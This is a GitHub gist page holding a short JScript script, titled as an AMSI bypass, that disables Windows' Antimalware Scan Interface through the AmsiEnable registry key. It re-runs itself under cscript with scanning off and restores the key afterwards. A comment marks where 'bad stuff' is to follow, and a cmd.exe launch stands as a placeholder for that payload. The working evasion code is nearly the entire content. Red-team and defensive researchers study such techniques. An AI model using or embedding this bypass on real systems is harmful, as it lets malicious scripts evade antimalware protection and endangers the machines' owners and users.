Skip to content

Instantly share code, notes, and snippets.

@rxwx
Created August 16, 2018 17:14
  • Star 5 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
Embed
What would you like to do?
AMSIEnable Bypass in JScript
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
var AmsiEnable = sh.RegRead(key);
if(AmsiEnable!=0){
throw new Error(1, '');
}
}catch(e){
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName,0,1); // blocking call to Run()
sh.RegWrite(key, 1, "REG_DWORD"); // put it back
WScript.Quit(1);
}
// do bad stuff below
sh.Run("cmd.exe /k echo AMSI bypassed :)")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment